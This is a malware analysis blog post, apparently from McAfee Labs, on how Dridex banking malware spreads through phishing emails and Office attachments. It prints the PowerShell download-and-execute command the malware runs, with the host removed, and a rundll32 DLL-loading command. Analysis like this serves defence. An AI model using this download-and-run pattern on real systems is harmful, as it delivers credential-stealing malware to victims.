‘Banking’ Malware Dridex Arrives via Phishing Email

By and on

Microsoft Office scripting malware has become more and more common and aggressive lately as malware authors constantly develop new techniques to evade detection and deceive users.

This kind of malware, as mentioned in previous posts, usually arrives as an attached document within a phishing email. After the “document” is opened, it downloads the second-stage payload, which downloads and executes the final payload that infects the host machine.

In a recent case involving the Dridex malware, McAfee Labs found the distribution method to be typical: The malware arrives via a phishing email:

Office Powershell - e-mail

We have discovered that the attached document can arrive in one of two variants:

  • The first variant comes as an XML document (.XML or .DOC) containing an embedded Office object encrypted in base 64. The object is decrypted and executed when the XML file is opened.
    Office Powershell - XML

    The embedded ActiveMime object contains an encrypted OLE document that is decrypted and executed just after the Office object is opened by the XML file.
    Office PowerShell - ActiveMime
    The OLE file then executes a malicious embedded macro that contains code similar to what we see in the following image. This code executes PowerShell and downloads the Dridex Loader.
    Office Powershell - Macro
  • The second variant comes as a Word or Excel file (.DOC or .XLS) that contains an Office Active Object which executes the malicious code in the OLE file as native OLE code.Office Powershell - OLE NativeThus, even if the user has not enabled the execution of macros, the malware can execute by running the malicious code directly from the OLE file. To deceive the user, the malware presents a document file with an Active Object embedded. As shown in the following image, the user is warned about opening malicious Active Objects, similar to the warning displayed next whenever a user tries to open a document containing an embedded macro:Office Powershell - Opening AttachmentOffice Powershell - Excel downloader
    An incautious user might open the embedded Active Object by ignoring the warning and double-clicking the object. In this case, the downloader code will run by executing a PowerShell instance, as in the previous variant.

In either case, the embedded malicious code will execute a command-line instruction that runs powershell.exe with the following parameters:

Office Powershell - Powershell

  • cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile(‘hxxp:// /asalt/assa.exe’,’%TEMP%\JIOiodfhioIH.cab’); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

The preceding code will run only if powershell.exe is installed on the system. (The malicious URL has been edited for safety.)

After executing this code, the malware downloads and executes the Dridex loader, which downloads and installs the Dridex DLL on the system.

Office PowerShell - Powershell downloader traffic

Office Powershell - Dridex Running

This DLL is injected into explorer.exe by running the following command:

  • rundll32.exe “C:\XX.tmp” NotifierInit

After executing this command, Dridex installs itself on the system, rundll.exe is terminated, and the host is infected. The malware then contacts its control server(s) to report the infection.

Dridex is “banker” malware that can steal user credentials for online accounts; it is derived from Cridex. Both are part of the GameOver Zeus malware family.

The following control servers were contacted by the malware during our research. We recommend blocking the following IPs:


McAfee products detect this malware and its payload with the following detection names:

  • W97MDownloaders: W97M/Downloader.aen, W97M/Downloader.aev, W97M/Downloader.afc, X97M/Downloader
  • Dridex Downloader(Loader): Downloader-FAQM, Downloader-FAQZ
  • Dridex 32/64 bits: PWS-Dridex

Leave a Comment

Similar articles

Analytics 101

By on
From today’s smart home applications to autonomous vehicles of the future, the efficiency of automated decision-making is becoming widely embraced. Sci-fi concepts such as “machine learning” and “artificial intelligence” have been realized; however, it is important to understand that these terms are not interchangeable but evolve in complexity and knowledge to drive better decisions. Distinguishing ...
Read Blog
A new banking trojan has emerged and is going after users’ Android devices. Dubbed Cerberus, this remote access trojan allows a distant attacker to take over an infected Android device, giving the attacker the ability to conduct overlay attacks, gain SMS control, and harvest the victim's contact list. What's more, the author of the Cerberus ...
Read Blog